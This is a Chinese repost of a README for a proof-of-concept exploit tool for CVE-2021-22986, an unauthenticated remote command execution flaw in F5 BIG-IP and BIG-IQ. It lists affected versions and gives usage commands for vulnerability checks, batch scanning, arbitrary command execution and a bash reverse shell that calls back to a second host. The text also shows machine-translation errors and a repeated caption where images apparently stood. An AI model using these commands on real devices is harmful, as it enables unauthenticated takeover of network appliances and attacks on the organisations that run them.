CVE – 2021 -22986 POC

自述文件

此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址访问iControl REST接口,从而可以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过控制平面利用,而不能通过数据平面利用。剥削可能导致完全的系统危害。设备模式下的BIG-IP系统也容易受到攻击。

影响产品

  • F5 BIG-IQ 6.0.0-6.1.0

  • F5 BIG-IQ 7.0.0-7.0.0.1

  • F5 BIG-IQ 7.1.0-7.1.0.2

  • F5 BIG-IP 12.1.0-12.1.5.2

  • F5 BIG-IP 13.1.0-13.1.3.5

  • F5 BIG-IP 14.1.0-14.1.3.1

  • F5 BIG-IP 15.1.0-15.1.2

  • F5大IP 16.0.0-16.0.1

Vunl Check

基本用法

python3 CVE_2021_22986.py


CVE - 2021 -22986 POC


外部扫描

python3 CVE_2021_22986.py -v true -u https://192.168.174.164

CVE - 2021 -22986 POC

命令执行:

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

CVE - 2021 -22986 POC

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

CVE - 2021 -22986 POC

批量扫描

python3 CVE_2021_22986.py -s true -f check.txt

CVE - 2021 -22986 POC

备用壳

python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"

CVE - 2021 -22986 POC

CVE - 2021 -22986 POC

新POC

python3 newpoc.py https://192.168.174.164

CVE - 2021 -22986 POC

参考

  • https://support.f5.com/csp/article/K03009991

  • https://github.com/safesword/F5_RCE

  • https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986


CVE - 2021 -22986 POC


版权归原作者所有,如若转载,请注明出处:https://www.ciocso.com/article/519.html

(0)
上一篇 2021-03-24 23:59
下一篇 2021-03-25 00:10

相关推荐

发表回复

登录后才能评论